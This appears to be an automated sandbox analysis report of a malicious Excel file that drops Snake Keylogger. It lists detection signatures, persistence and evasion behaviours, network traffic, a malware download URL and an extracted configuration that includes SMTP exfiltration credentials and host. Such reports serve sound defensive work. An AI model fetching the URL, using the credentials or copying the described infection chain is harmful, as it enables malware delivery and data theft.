Windows Analysis Report
DGTCkacbSz.xlsx

Overview

General Information

Sample name: DGTCkacbSz.xlsx
renamed because original name is a hash value
Original sample name: 88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39(1).xlsx
Analysis ID: 1562377
MD5: adfcfa59a06bbc5a0faa8f5b0ff663fe
SHA1: 01d4b8e70b641863727d671e9b087633f3b3a37e
SHA256: 88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39
Tags: cia-tfxlsxuser-JAMESWT_MHT

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Drops large PE files
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: DGTCkacbSz.xlsx Avira: detected
Source: DGTCkacbSz.xlsx Avira: detected
Source: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\svcost.exe Avira: detection malicious, Label: HEUR/AGEN.1310409
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe ReversingLabs: Detection: 68%
Source: DGTCkacbSz.xlsx ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\svcost.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Joe Sandbox ML: detected
Source: DGTCkacbSz.xlsx Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.22:49161 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp667.PDBO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: i0C:\Windows\mscorlib.pdbO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 4x nop then jmp 00600D90h 5_2_00600CD8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 4x nop then jmp 006B0944h 5_2_006B08A8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 4x nop then jmp 006B0944h 5_2_006B0B20
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 4x nop then jmp 006B0944h 5_2_006B0C56
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 4x nop then jmp 006FB60Bh 5_2_006FB401
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 4x nop then jmp 006FB60Bh 5_2_006FB410
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 5_2_0498DB88
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 4x nop then jmp 00C20944h 8_2_00C20898
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 4x nop then jmp 00C20944h 8_2_00C208A8
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 4x nop then jmp 00C20944h 8_2_00C20AFE
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 4x nop then jmp 00C20944h 8_2_00C20C56
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 4x nop then jmp 00C2F5D0h 8_2_00C2F510
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 4x nop then jmp 00C2F5D0h 8_2_00C2F518
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 4x nop then jmp 00C5B60Bh 8_2_00C5B401
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 4x nop then jmp 00C5B60Bh 8_2_00C5B410
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 8_2_04B7DB88
Source: global traffic DNS query: name: cia.tf
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161

Networking

Source: Yara match File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
